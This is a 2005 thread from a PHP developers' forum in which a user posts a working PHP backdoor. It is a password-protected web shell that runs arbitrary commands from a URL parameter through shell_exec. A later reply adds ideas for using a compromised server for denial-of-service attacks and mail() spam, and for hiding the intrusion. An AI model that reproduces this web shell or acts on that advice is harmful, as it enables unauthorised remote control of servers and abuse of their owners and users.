PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.
 
Loading
It is currently Thu Jul 09, 2020 10:56 pm

All times are UTC - 5 hours




Post new topic Reply to topic  [ 7 posts ] 
Author Message
 Post subject: PHP Backdoor
PostPosted: Mon Mar 07, 2005 5:22 pm 
Offline
Forum Newbie

Joined: Mon Mar 07, 2005 4:44 pm
Posts: 7


Top
 Profile  
 
 Post subject:
PostPosted: Mon Mar 07, 2005 5:23 pm 
Offline
Forum Newbie

Joined: Mon Mar 07, 2005 4:44 pm
Posts: 7
This is a sample of backdoor, but it need shell access enabled.
So webmasters having shared account will not have any problem..

Syntax: [ Download ] [ Hide ]
<?php

echo "<html>\n<head>\n<title>Don't let BWall find you using this.</title>\n";

$b = $_GET["cmd"];

$pass = $_GET["pwd"];

$optpre = $_GET["pre"];

if (MD5($pass) == "2ffe4e77321d9a7152f7016ea7aa5114")

{

    echo "</head>\n<body bgColor=#000000 text=#FF0000>";

    if ($optpre == "yes")

    {

        $output = shell_exec($b);

        echo "<pre>$output</pre>";        

    }else

    {    

        $output = shell_exec($b);

        echo "$output";    

    }



}else

{

    echo "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL=http://\">\n";

    echo "</head>\n<body bgColor=#000000 text=#FF0000>";

}



?>

</body>

</html>


I found this one long time back, but there maybe some backdoors which may run without shell access.


Top
 Profile  
 
 Post subject:
PostPosted: Mon Mar 07, 2005 5:36 pm 
Offline
Breakbeat Nuttzer
User avatar

Joined: Wed Mar 24, 2004 8:57 am
Posts: 13098
Location: Melbourne, Australia
Hmmm.... I'm looking at your username... then at the question... then at your username..... :lol: :lol:

This probably more of a question for the PHP Security forum on this site but whether or not anybody will answer I dont know.

I think some guys will be a bit reluctant to answer this... it may well even be removed depending upon how the thread progresses 8O


Top
 Profile  
 
 Post subject:
PostPosted: Mon Mar 07, 2005 6:20 pm 
Offline
Neighborhood Spidermoddy
User avatar

Joined: Mon Mar 29, 2004 4:24 pm
Posts: 31559
Location: Bothell, Washington, USA


Top
 Profile  
 
 Post subject:
PostPosted: Mon Mar 07, 2005 10:00 pm 
Offline
Forum Donator

Joined: Mon Oct 20, 2003 8:31 pm
Posts: 1661
Location: Maine, USA


Top
 Profile  
 
 Post subject:
PostPosted: Tue Mar 08, 2005 12:15 am 
Offline
Forum Newbie

Joined: Mon Mar 07, 2005 4:44 pm
Posts: 7


Top
 Profile  
 
 Post subject:
PostPosted: Wed Mar 09, 2005 10:37 pm 
Offline
DevNet Master
User avatar

Joined: Mon Oct 25, 2004 9:29 pm
Posts: 3698
Location: New Jersey, US
You're probably going to need shell access to do any real damage.

Although you could probably set up a DOS script using Curl or something if each script refers back to a configuration file (then whenever someone accesses the page, they send a hit somewhere.

What you could also do is abuse their mail() function, sending spam with a similar method.

A backdoor... that's going to be difficult though. Better off making it seem like you never got in at all. If you got in the first place, it's probably because of a bad password or something.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 7 posts ] 

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 10 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group